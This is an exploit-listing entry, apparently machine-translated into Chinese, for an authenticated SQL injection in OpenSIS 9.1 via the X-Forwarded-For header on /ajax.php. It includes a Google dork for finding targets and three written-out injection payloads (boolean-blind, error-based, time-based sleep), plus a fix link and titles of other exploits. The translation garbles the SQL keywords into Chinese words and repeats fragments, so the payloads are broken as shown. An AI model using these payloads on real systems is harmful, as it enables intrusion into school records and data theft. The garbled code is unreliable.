Opensis 9.1 -SQLI（认证）

[HackApt-37 Team已验证会员]

＃利用标题: OpenSis 9.1 -SQLI（认证）
＃Google Dork: Intext:'opensis是产品'
＃date: 09.09.2024
＃利用作者: DevrimDıragumandan（d0ub1edd）
＃供应商homepage: https://www.os4ed.com/
＃软件link: https://github.com/os4ed/opensis-classic/releases/tag/v9.1
＃版本: 9.1
＃在: Linux上测试
OS4ED开源信息系统社区v9.1中存在SQL注入脆弱性，该v9.1通过发送到/ajax.php的后请求中的“ x-forded-for”标头参数。
get /ajax.php?modname=x http /1.1
---
参数: x-forwarded-for＃1*（（（自定义）标头）
Type:基于布尔的盲人
title: mysql和基于布尔值的盲人- 在哪里，在何处，订购，按子句（extractValue）
payload: 127.0.0.2'和extractValue（5785，何时（5785=5785），然后5785其他0x3a end）和'hvwg'='hvwg
type:基于错误的
title: mysql=5.6和基于错误的基于错误的位置，按子句（GTID_SUBSET）列入，订购或组
payload: 127.0.0.2'和gtid_subset（concat（0x717a787671，（select（select（elt（5261=5261,1）））），0x71716b6b6b71），5261），5261）和'djze'='djze'='djze'='djze'='djze'
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
PAYLOAD: 127.0.0.2'和（从（Select（Sleep（5））veyp）和“ Ziae”='Ziae
---
Fix: https://github.com/os4ed/opensis-classic/pull/322

 

H

Rengine 2.2.0-命令注射（认证）

H

dizquetv 1.5.3-远程代码执行（RCE）